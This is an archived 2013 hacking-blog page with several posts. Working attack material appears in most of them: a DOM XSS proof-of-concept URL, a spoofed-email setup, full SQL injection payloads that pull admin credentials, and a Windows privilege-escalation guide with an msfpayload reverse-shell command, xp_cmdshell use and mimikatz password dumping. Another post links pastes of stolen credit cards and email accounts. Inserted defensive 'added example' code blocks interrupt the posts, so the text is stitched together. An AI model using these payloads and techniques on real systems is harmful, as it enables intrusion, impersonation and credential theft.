Tuesday, May 21, 2013

Kali Linux DOM Based XSS Writeup

Recently, I have been on a mission to find XSS in popular security training websites, since these are the ones that care about their security the most. I have been successful in finding it in almost all of the ones I have tried to date. This one was a bit interesting, so I thought I would write a post on it. Basically it was not a reflected/stored XSS; it was a DOM based XSS, similar to the one I found in Microsoft. Unlike the others, this particular XSS occurs in client side JavaScript.

In order to provide features to users, lots of webmasters/vendors are moving their code to the client side. The data is embedded in the DOM and is not filtered before it is reflected back to the user, which results in a DOM based XSS. The main cause of these vulnerabilities is dangerous sinks. The DOM based XSS wiki is a good source where you can find dangerous sources and sinks.

On checking the source of kali.org, I immediately found that it was running WordPress version 3.5.1. This was the latest version of WordPress at the time and had no known public vulnerabilities, so I moved on to testing plugins.



I tested a couple of plugins but did not find any of them vulnerable. By analyzing the source more deeply I found a pretty interesting plugin, "WP-Pretty Photo", which caught my interest. It is a jQuery based lightbox for the WordPress platform.


While searching for common vulnerabilities in the wp-prettyphoto plugin, I found that it was vulnerable to DOM based XSS. So I quickly added my payload to the URL and bam, it triggered an XSS.




POC:

http://www.kali.org/#!%22%3E%3Cimg%20src=1%20onerror=prompt%280%29;%3E//

Some debugging with the Chrome JS console led me to line 79 of jquery.prettyPhoto.js, the line of code responsible for the DOM based XSS.

http://www.kali.org/wp-content/themes/persuasion/lib/scripts/prettyphoto/js/jquery.prettyPhoto.js?ver=2.1


It was also obvious from the code that a ! sign was required to successfully execute the JavaScript.


The input inside the hashrel was not filtered before it was displayed to the user, which resulted in the DOM based XSS.

The Fix

The following URL discusses the fix:

https://github.com/Duncaen/prettyphoto/commit/3ef0ddfefebbcc6bbe9245f9cea87e26838e9bbc
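As an added example (not prettyPhoto's code and not the linked fix), here is the shape of a hardened handler for the "#!" deep-link fragment: the fragment is accepted only if it matches a strict, assumed "#!name[gallery]/index/" format, and anything rendered is HTML-escaped. The vulnerable builder beside it shows why the PoC fragment above runs when raw hash text reaches markup.

```javascript
// Added example, not from the plugin or its fix. Demonstrates validating a
// location.hash deep link before it is used, against the page's own PoC fragment.

// Assumed deep-link format: "#!<hook>[<gallery>]/<n>/", e.g. "#!prettyPhoto[gallery1]/2/".
// Only letters, digits, "_" and "-" are allowed in the names; anything else is rejected.
const HASHREL_PATTERN = /^#!([A-Za-z0-9_-]+)(?:\[([A-Za-z0-9_-]+)\])?\/(\d+)\/?$/;

// Returns the parsed parts of a valid fragment, or null for anything unexpected.
function parseHashRel(hash) {
  if (typeof hash !== 'string') return null;
  const m = HASHREL_PATTERN.exec(hash);
  if (!m) return null; // unknown or hostile shape: ignore the deep link entirely
  return { hook: m[1], gallery: m[2] || null, index: Number(m[3]) };
}

// Escapes the five characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

// Vulnerable pattern (what lets the payload run): raw hash text is written into markup.
function unsafeLink(hash) {
  const rel = hash.slice(2); // strip "#!"
  return '<a rel="' + rel + '">open</a>';
}

// Hardened: only a validated fragment is used, and it is escaped on output.
function safeLink(hash) {
  const p = parseHashRel(hash);
  if (!p) return null;
  const rel = p.gallery ? p.hook + '[' + p.gallery + ']' : p.hook;
  return '<a rel="' + escapeHtml(rel) + '" data-index="' + p.index + '">open</a>';
}

// The PoC fragment from the post, URL-decoded (constructed here from the post's URL).
const POC_HASH = '#!"><img src=1 onerror=prompt(0);>//';

console.log('unsafe:', unsafeLink(POC_HASH)); // markup now contains an <img ...> tag
console.log('safe:', safeLink(POC_HASH));     // null: the fragment is rejected
console.log('legit:', safeLink('#!prettyPhoto[gallery1]/2/'));
```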

If this was not enough for you, then listen to this: the Offensive Security team was very awesome, in the sense that they gave me a free voucher for their famous certification, PWB 3.0.

 
I was really surprised to see that Dominator was not detecting it, as it is the only good tool for finding DOM based XSS, leaving IBM's JavaScript scan apart. In the past I have tried Dominator against various websites suffering from DOM based XSS and found that at some spots it is very good and at some spots it needs much improvement. Here is the screenshot:




I would like everyone to act the same way I did and responsibly disclose every issue you find.

Friday, May 17, 2013

Use One Gmail Account to Send Emails from Multiple IDs

In this post, I am going to show you how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account, for example one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or send emails, I have a solution here.
Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send and receive emails for the different email addresses you have. Let's take a simple example.
Suppose you have three email addresses (email accounts):
  1. john@gmail.com
  2. john@yahoo.com
  3. john@hotmail.com
You can integrate john@yahoo.com and john@hotmail.com into john@gmail.com and operate all three accounts from your single Gmail account. Here is a step-by-step procedure to do this:
  1. Log in to your Gmail account.
  2. Click on Settings at the top right corner.
  3. Under Settings, click on the Accounts tab.
  4. Now you'll see the first option, "Send mail as:".
  5. Under this option, click on Add another email address you own.
  6. A small new window will pop up asking you to enter the details of your new email address.
  7. Here you can enter any name and any email address. The email address need not belong to Gmail only; you can enter your Yahoo, Hotmail or any other valid email address.
  8. A verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated into your Gmail account.
Now, when you compose a new email, you'll see an option to select which of your multiple addresses to send the mail from. You will also receive the incoming mail for multiple addresses in a single mailbox. I hope this will benefit you.
Before you leave, I should also tell you one good advantage of this. According to Gmail's privacy policy, they do not send the user's IP address in outgoing emails. That means that when you send an email from your Gmail account, the receiver will not be able to find out your IP address. You do not have this advantage with Yahoo or other email providers.
Please share your opinions through comments. I hope this helps.

How Was 1337day.com Hacked?

This morning, when I browsed to 1337day.com (the famous exploit buying/selling database), I was shocked to see 1337day defaced by the famous Turkish hacker group named "Turkguvenligi". In the past, Turkguvenligi has been responsible for defacements of lots of famous websites. Here is what appeared when I came across 1337day.com:



On their defacement page, they said that they had asked 1337day to ban a fake user with author id 5819 but 1337day refused to do so. As I browsed to http://www.1337day.com/author/5819, the website first appeared to be inaccessible; later it showed the following message:


However, I used their mirror site 1337day.org to access the author link. Here is the screenshot:


By looking at the author name "Agd_Scorp", I understood the whole point of the dispute. Agd_Scorp is a well known hacker and founding member of "Turkguvenligi". He is responsible for lots of high profile defacements; if you take a look at his Zone-H record, it's pretty impressive, and he has a history of hacking into domain registrars.

It appears to me that someone was submitting exploits under the name of Agd_Scorp. They asked the 1337day team to remove it, but 1337day refused. Therefore they defaced the website.

How was 1337day.com hacked?

There have been issues in the past where 1337day, injectors etc. and their mirror websites were hacked, but in all of those cases their servers were never compromised; it was their domain registrar, Moniker.com, which got compromised by the attackers.

The attackers compromised Moniker.com and changed the domain's DNS servers to their own DNS servers, a story matching the Google Pakistan hack. The 1337day team later confirmed on their Facebook page that their domain registrar was the victim of the attack, not their DNS servers.

They have also asked webmasters not to invent stories that their server was hacked. They say it's impossible; I don't agree with them on this point. Even the most secure systems can be compromised.

On performing a WHOIS lookup, I came to know that they have actually switched their hosting account from Moniker.com to hostgator.com.


I have confirmed with HostGator that the DNS servers for websitewelcome belong to them. We will update you as soon as we have more information.

Thursday, May 16, 2013

How to Send Spoofed Emails Anonymously

Most of us are very curious to know a method to send spoofed emails to our friends and family for fun. But the question is, is it possible to send spoofed emails in spite of the advanced spam filtering technology adopted by email service providers like Gmail, Yahoo etc.?
The answer is YES, it is still possible to bypass their spam filters and send spoofed emails anonymously to your friends or family members. For example, you can send an email to your friend with the following sender details.
From: Bill Gates <billg@microsoft.com>
The art of sending this kind of email is known as Email Spoofing. One of the easy ways to send a spoofed email is by using our own local SMTP server. In the past, I have tried SMTP servers like QK SMTP server. This method used to work successfully in those days, but as of now it has a very low success rate, since Gmail and Yahoo (all major email service providers) block emails that are sent directly from a home computer.

How to Send Spoofed Emails?

In this post, I have come up with a new method of sending spoofed emails to anyone without having to worry about being blocked or filtered as spam. In order to accomplish this, all you have to do is use a "relay server" while sending the spoofed emails.

What is a Relay Server?

In simple words, a relay server is an SMTP server that is trusted by major companies as an authorized sender of email. So, when you send an email using a relay server, email service providers like Yahoo and Gmail blindly accept the emails and deliver them to the inbox of the recipient. If the SMTP server is not authorized, Google and Yahoo will reject all the emails sent from that SMTP server. This is the reason why using our own SMTP server to send emails fails.

So, How to Find a Relay Server?

Now all we have to do is find a trusted SMTP server so as to send spoofed emails successfully. Usually, all the emails sent from web hosting providers are trusted and authorized. So you have to find a free web hosting provider that allows you to send emails. But most free web hosts disable the mail feature and do not allow users to send emails. This is done just to avoid spamming. However, all paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows you to send emails from their servers, it's a cakewalk to send anonymous emails. All we have to do is modify the email header to insert a fake From: address field into it.
I have created a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to set up your own anonymous email sender script:
  1. Go to X10 Hosting and register a new account.
  2. Download my script from the following link:
  3. Log in to your FreeWebHostingArea account and click on File Manager.
  4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.
  5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.
  6. Now type the following URL:
    http://yoursite.x10hosting.com/sendmail.php
    NOTE: yoursite must be substituted by the name of the subdomain that you chose during the registration process.
  7. Use the script to send spoofed emails anonymously to your friends and have fun. Enjoy!!!
Tell me whether it worked or not. Please pass your comments.
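From the receiving side, as an added example that is not part of the post: a check for the forgery just described, where a relay that is legitimate for its own domain carries a From: header naming someone else. It parses a raw header block and tests whether the From domain is aligned with the Return-Path and with the SPF and DKIM results the receiving server recorded in Authentication-Results; both header samples are constructed.

```javascript
// Added example, not from the post: receiving-side alignment check for a
// forged From: header. Domains and header samples below are constructed.

// Parses a raw RFC 5322 header block into a lowercase-keyed map, unfolding
// continuation lines first.
function parseHeaders(raw) {
  const headers = {};
  const lines = raw.replace(/\r?\n[ \t]+/g, ' ').split(/\r?\n/);
  for (const line of lines) {
    const i = line.indexOf(':');
    if (i < 1) continue;
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return headers;
}

// Extracts the domain part of an address header value ("Name <a@b>" or "a@b").
function addressDomain(value) {
  if (!value) return null;
  const m = /<([^>]+)>/.exec(value) || /([^\s<>]+@[^\s<>]+)/.exec(value);
  const addr = m ? m[1] : value;
  const at = addr.lastIndexOf('@');
  return at === -1 ? null : addr.slice(at + 1).toLowerCase();
}

// Relaxed alignment: same organisational domain or a subdomain of it.
function aligned(a, b) {
  return !!a && !!b && (a === b || a.endsWith('.' + b) || b.endsWith('.' + a));
}

// Flags a message whose From: domain is not backed by an aligned envelope
// sender, a passing SPF result and an aligned DKIM signature.
function assessSpoofing(rawHeaders) {
  const h = parseHeaders(rawHeaders);
  const fromDomain = addressDomain(h['from']);
  const envDomain = addressDomain(h['return-path']);
  const ar = h['authentication-results'] || '';
  const spfPass = /\bspf=pass\b/i.test(ar);
  const dkim = /\bdkim=pass\b[^;]*header\.d=([^\s;]+)/i.exec(ar);
  const dkimDomain = dkim ? dkim[1].toLowerCase() : null;

  const reasons = [];
  if (!fromDomain) reasons.push('no parseable From domain');
  if (!aligned(fromDomain, envDomain)) reasons.push('From domain not aligned with Return-Path');
  if (!spfPass) reasons.push('SPF did not pass');
  if (!dkimDomain || !aligned(fromDomain, dkimDomain)) reasons.push('no aligned DKIM signature');
  return { fromDomain, envDomain, dkimDomain, spfPass, suspicious: reasons.length > 0, reasons };
}

// Constructed sample 1: the From: from the post, sent through a relay that is
// only authorised for its own domain (SPF passes for relay.example.net, no DKIM).
const SPOOFED = [
  'Return-Path: <user@relay.example.net>',
  'Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=relay.example.net',
  'From: Bill Gates <billg@microsoft.com>',
  'To: friend@example.org',
  'Subject: hi',
].join('\r\n');

// Constructed sample 2: envelope, SPF and DKIM all aligned with the From: domain.
const LEGIT = [
  'Return-Path: <bounce@mail.example.com>',
  'Authentication-Results: mx.example.org; spf=pass smtp.mailfrom=mail.example.com;',
  '  dkim=pass header.d=example.com',
  'From: Alice <alice@example.com>',
  'To: friend@example.org',
  'Subject: hi',
].join('\r\n');

console.log(assessSpoofing(SPOOFED)); // suspicious: true, two reasons
console.log(assessSpoofing(LEGIT));   // suspicious: false
```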

How to Block Unwanted Emails

Do you want to block unwanted emails from your ex wife/husband? Do you want to block those annoying offers and newsletters that reach your inbox? Well, here is a way to block all those unwanted and annoying emails that you do not want to see or read!
In this post, I will show you a trick with which you can block an individual email address or a whole domain from which you do not want emails to come.

Steps to Block Unwanted Emails from Your Account:

Here is a separate set of steps to follow for each individual service provider:

For Gmail:

Here is how you can block emails for Gmail:
  1. Log in to your account.
  2. At the top-right corner, click on Settings.
  3. Under Settings, click on Filters.
  4. You'll now see an option "Create a new filter"; click on it.
  5. Now in the From field, enter the email address from which you do not want to receive emails.
    For ex. you may enter john@gmail.com in the "From:" field to block all incoming emails from this address. However, if you want to block the whole domain, then use the following syntax: *@xyz.com. Now all the incoming emails from the domain "xyz.com" will be blocked.
  6. Click on Next Step and select the action you'd like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. In case you would like to unblock those emails, all you need to do is delete the filter that you've created.

For Yahoo:

Here is how you can block unwanted emails for Yahoo:
  1. Log in to your account.
  2. At the top-right corner, click on Options.
  3. A drop down menu appears; now click on More options.
  4. In the left panel select the option Filters and click on create or edit filters.
  5. Now click on Add.
  6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.
    For ex. john@gmail.com, or if you want to block an entire domain then just enter @xyz.com. Don't enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.

For Hotmail:

Here is how to do the same for Hotmail:
  1. Log in to your account.
  2. At the top-right corner, click on Options.
  3. A drop down menu appears; now click on More options.
  4. Click on the Safe and blocked senders link under Junk e-mail.
  5. Now click on Blocked senders.
  6. Type in the email address that you want to block in the blocked e-mail address or domain field.
    For ex. enter john@yahoo.com to block the individual email address, or just enter xyz.com to block the entire domain.
That's it. You will no longer receive those annoying emails in your inbox. Keep your inbox clean and tidy. I hope this post helps. Pass your comments!

How to Bypass Right Click Block on Any Website

You might remember an experience where you tried to right-click on a web page but got a pop-up message saying that "right-click functionality has been disabled". Sometimes you may be trying to copy an image or view the source of a web page, but when right-click is disabled these things would seem impossible. Bank websites and other sites that require a secure transaction, such as a payment gateway, are the ones that impose this kind of limited functionality on their pages. In this post, I will show you the ways by which you can easily bypass the right-click block feature on any website.
In order to block the right-click activity, most websites make use of JavaScript, which is one of the popular scripting languages used to enhance functionality, improve user experience and provide rich interactive features. In addition to this, it can also be used to strengthen the website's security by adding some simple security features such as disabling right-click, protecting images, hiding or masking parts of a web page and so on.

How Does JavaScript Work?

Before you proceed to the next part, which tells you how to disable JavaScript and bypass any of the restrictions imposed by it, it would be worthwhile to take a minute to understand how JavaScript works.
JavaScript is a client side scripting language (in most cases), which means when loaded it runs from your own web browser. Most modern browsers including IE, Firefox, Chrome and others support JavaScript so that they can interpret the code and carry out actions that are defined in the script. In other words, it is your browser which is acting upon the instruction of JavaScript to carry out the defined actions such as blocking the right-click activity. So, disabling the JavaScript support on your browser can be a simple solution to bypass all the restrictions imposed by the website.

How to Disable JavaScript?

Here is a step-by-step procedure to disable JavaScript on different browsers:

For Internet Explorer:

If you are using IE, just follow the steps below:
  1. From the menu bar, go to Tools -> Internet Options.
  2. In the "Internet Options" window, switch to the Security tab and click on the button Custom level...
    [Screenshot: IE Security Settings]
  3. In the Security Settings, look for the option Active scripting, select the Disable radio button as shown above and click on "OK".
  4. You may even select the Prompt radio button, so that each time a page is loaded you will have the option to either enable or disable scripting.

For Google Chrome:

If you are using Chrome, you can disable JavaScript by following the steps below:
  1. Click on the Chrome "menu" button (on the top right corner) and select Tools.
  2. From the "Settings" page, click on Show advanced settings...
  3. Now under Privacy, click on the button Content settings...
    [Screenshot: Chrome Content Settings]
  4. Under JavaScript, select the radio button which says "Do not allow any site to run JavaScript" and click on "Done".

For Mozilla Firefox:

Steps to disable JavaScript on Firefox:
  1. From the menu bar, click on Tools -> Options.
  2. In the Options window, switch to the Content tab, uncheck the option which says "Enable JavaScript" and click on "OK".
    [Screenshot: Firefox Content Options]

How to Bypass the Right Click Block?

In order to bypass the right-click block or any other restriction imposed by JavaScript, all you need to do is disable it in the browser and refresh the same page, so that it reloads without JavaScript functionality. You are now free to right-click on the page, view its source or even copy any of the images that you may want to. Don't forget to re-enable JavaScript once your job is over. Otherwise, the lack of JavaScript support may result in unusual rendering of web pages.

Thursday, May 9, 2013

Anonymous Hackers Cause Significant Damage To Banking And Government Agencies

A collective of hacker groups planned to attack the websites of major government agencies and banks on May 7 to protest American foreign policy.

For weeks, the groups, which include Anonymous, have used social media to publicize their planned operation, dubbed "#OpUSA."


Experts from the USA (to cover things up) say that the attack was not well planned or focused. On the other hand, Twitter is full of #OpUSA tweets, which tell us a different story. The hacker groups have compromised a large number of targets which are either owned by the US government or by its residents.

AnonGhost made a significant contribution to #OpUSA by taking down a large number of websites and leaking emails, credit cards, etc. According to their pastebin post, the hackers claim to have hacked:

- More than 700 websites (http://pastebin.com/zftTrrrh)
- More than 10k American credit cards (http://pastebin.com/D4QCynHC)
- 1 lac (100,000) email accounts which belong to US residents (http://www45.zippyshare.com/v/58998013/file.html)
- More than 5000 Facebook accounts (http://pastebin.com/NRvmnYFe)
- More than 12k email accounts of USA (http://www11.zippyshare.com/v/39103082/file.html)

The complete paste can be seen here(http://pastebin.com/RSqKCd1N).

The list of hacked sites mostly includes high profile government websites from Australia, the Ministry of Environment of Dominica, the government of Argentina, the Philippines, NGOs, universities and other educational institutions from Thailand, Brazil, Russia, Israel, USA, Canada, UK, Romania, and Italy.

Most of the sites seem to have recovered, but some of them are still defaced, down or under maintenance.

We managed to ask the leader of AnonOps, "Mauritania Attacker", who is also responsible for lots of high profile defacements, about the purpose and the cause of #OpUSA.

"I attack USA because they think that Muslims are terrorists, but the reality is that they themselves are the biggest terrorists and they declared war against Islam, and me as a Muslim I will stand against them even if I die," Mauritania Attacker said.

Mauritania Attacker is the leader of AnonOps. He played a major role in #OpIsrael, and along with it he is also responsible for other high profile attacks on lots of other organizations.

Note: RHA has no association with any of the hacktivists.

Wednesday, May 8, 2013

SQL Injection With Update Query

We have written a couple of articles discussing various techniques and attack vectors for SQL injection. We have already discussed Basic SQL Injection With Union Based, Blind SQL Injection and Time Based SQL Injection, and also discussed common problems and their solutions related to SQL injection. This time Daniel Max, a regular reader of RHA, will discuss exploiting SQL injection with an UPDATE query.

Most of the tutorials you see on the web explain how to use SELECT in order to retrieve data from the database. But what if we wanted to update something that is already present in the database, for example an MD5 hash that we are not able to crack? In order to gain access to the admin panel, we would simply run an UPDATE query and it would overwrite the password. We recommend that you at least read a little about MySQL on w3schools.com before proceeding with this tutorial, as it is not for complete beginners.

Requirements

Below is a screenshot of the form we want to update. What we want to update is the email address, using our SQL injection.


The vulnerable parameter is the "E-mail format:" value. We use Tamper Data to intercept and change the values.

Here is a screenshot:



After we click OK we get the following error:


First we want to find the exact database version, but what would be the easiest way?

We can set values for other parameters too; MySQL will let us do that as long as the parameter is one of the columns in the UPDATE query. We will use "fname", which is a string value. The database query output will be shown inside the "First name" input box (where it says MaXoNe).

Screenshot of version query:


Screenshot of the rendered content with database answer:





Now that we know how to create our query, let's get the tables.

Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = '

Tables Query:


Screenshot of the rendered content with database answer:




Three tables, strange!? Let's check that again, this time with count.

Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '

Screenshot of get tables count query:



Screenshot of the rendered content with database answer:




Now it is time for Burp Intruder. Set the browser to use 127.0.0.1 port 8080 as the proxy for all URLs.
We use Burp Suite Intruder with 'Attack type' "Sniper" and 'Payload type' "Numbers".

Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '

Screenshot of burp settings:



That's it. Now you get the columns the same way with Burp Suite.

Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '

Just increment n with Burp Suite.

Values:

Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '

Just increment n with Burp Suite.

That's it, simple and yet effective. I used this because the WAF blocked -- and --+ so I wasn't able to close and comment out the query.
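Added example (not from the post): it shows, in JavaScript, why the "html' , fname = (...) , phone = '" value above works against an UPDATE built by string concatenation, and how a parameterised statement with a fixed column list keeps the same value as plain data. Table and column names are assumed; no database is needed, the functions only build the statement text and its bound parameters.

```javascript
// Added example, not from the post. Table "profiles" and columns email_format,
// fname, phone are assumed names standing in for the form in the screenshots.

// The post's payload, verbatim: closes the email_format literal, smuggles a
// second assignment into the SET clause, then re-opens a quote that the
// following phone value will close.
const PAYLOAD =
  "html' , fname = (select group_concat(table_name) from information_schema.tables " +
  "where table_schema = database()) , phone = '";

// Vulnerable: values are spliced straight into the statement text, so a quote
// inside a value changes the structure of the SET clause.
function buildUpdateUnsafe(id, emailFormat, phone) {
  return "UPDATE profiles SET email_format = '" + emailFormat + "', phone = '" + phone +
    "' WHERE id = " + id;
}

// Hardened: column names come only from a fixed whitelist, and every value is
// sent as a bound parameter ("?" placeholder), never as statement text.
const ALLOWED_COLUMNS = new Set(['email_format', 'fname', 'phone']);

function buildUpdateSafe(id, fields) {
  const cols = Object.keys(fields);
  for (const c of cols) {
    if (!ALLOWED_COLUMNS.has(c)) throw new Error('unexpected column: ' + c);
  }
  const set = cols.map(c => c + ' = ?').join(', ');
  return {
    sql: 'UPDATE profiles SET ' + set + ' WHERE id = ?',
    params: [...cols.map(c => fields[c]), id],
  };
}

// Lists the column names that the SET clause of a statement actually assigns,
// which makes the smuggled "fname" assignment visible.
function assignedColumns(sql) {
  const set = sql.slice(sql.indexOf(' SET ') + 5, sql.indexOf(' WHERE '));
  // split on top-level commas only (commas inside parentheses belong to subqueries)
  const parts = [];
  let depth = 0, cur = '';
  for (const ch of set) {
    if (ch === '(') depth++;
    if (ch === ')') depth--;
    if (ch === ',' && depth === 0) { parts.push(cur); cur = ''; } else { cur += ch; }
  }
  parts.push(cur);
  return parts.map(p => p.trim().split(/\s*=/)[0]);
}

console.log(buildUpdateUnsafe(7, PAYLOAD, '555'));
console.log(assignedColumns(buildUpdateUnsafe(7, PAYLOAD, '555'))); // email_format, fname, phone, phone
console.log(buildUpdateSafe(7, { email_format: PAYLOAD, phone: '555' }));
```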

Sunday, May 5, 2013

Hacking Windows Servers - Privilege Escalation

Most of us here can hack websites and servers. But what we hate the most is an error message: Access Denied! We know some methods to bypass certain restrictions using symlinks, privilege escalation using local root exploits and some similar attacks.

But, these get the job done only on Linux servers. What about windows servers?

Here are some ways to bypass certain restrictions on Windows servers or get SYSTEM privileges.
  • Using the "sa" account to execute commands through MSSQL queries via the 'xp_cmdshell' stored procedure.
  • Using a meterpreter payload to get a reverse shell on the target machine.
  • Using browser_autopwn. (Really...)
  • Using other tools like pwdump7, mimikatz, etc.

Using the tools is the easy way, but the real fun of hacking lies in the first three methods I mentioned above.
1. Using xp_cmdshell

Most of the time on Windows servers we have read permission over the files of other IIS users, which is needed to make this method work.
If we are lucky enough, we will find the login credentials of the "sa" account of the MSSQL server inside the web.config file of some website.
You must be wondering, why only "sa"?
Here, "sa" stands for Super Administrator and, as the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing the login credentials of the "sa" account.


Using this, we can log into the MSSQL server locally (using our web backdoor) as well as remotely. I would recommend remote access because it does not generate webserver logs, which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can log in remotely using HeidiSQL.
HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.
After logging into the MSSQL server with the sa account, we get a list of databases and their contents.
Now we can execute commands using MSSQL queries via xp_cmdshell (with administrator privileges).
The syntax for the query is:
xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query:
xp_cmdshell 'whoami'


This shows that I am currently NT AUTHORITY\SYSTEM, which most of us know is the highest user in the Windows user hierarchy.
Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.
Note: If the server does not have the xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
  
2. Meterpreter Payload

This method is quite easy and comes in useful when we cannot read the files of other users but can execute commands.
Using Metasploit, generate a reverse shell payload binary.
For example:
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
Now we will upload this executable to the server using our web backdoor.
Run the multi/handler auxiliary at our end. (Make sure the ports are forwarded properly.)
Now it's time to execute the payload.
If everything goes right, we will get a meterpreter session on the target machine as shown below.
We can also use PHP, ASP or other payloads.
3. Browser Autopwn
This seems odd as a way of hacking a server, but I myself found it a clever way to do the job, especially in scenarios where we are allowed to execute commands but cannot run executables (our payloads) due to software restriction policies in a domain environment.
Most Windows servers have an outdated Internet Explorer, and we can exploit it if we can execute commands.
I think it is clear by now what I'm trying to explain ;)
We can start Internet Explorer from the command line and make it browse to a specific URL.
The syntax for this is:
iexplore.exe [URL]
where URL would be our server address, which would be running browser_autopwn. After that we can use Railgun to avoid antivirus detection.


4. Using readily available tools
Tools like pwdump and mimikatz can crack passwords of Windows users.
pwdump7 gives out the NTLM hashes of the users, which can be cracked further using John the Ripper.
The following screenshot shows NTLM hashes from pwdump7:
mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is in some language other than English, so do watch tutorials on how to use it.
The following picture shows plain text passwords from mimikatz:
You can Google them and learn how to use these tools and what they actually exploit to get the job done for you.
I hope you can now exploit every other Windows server.
Happy Hacking :)
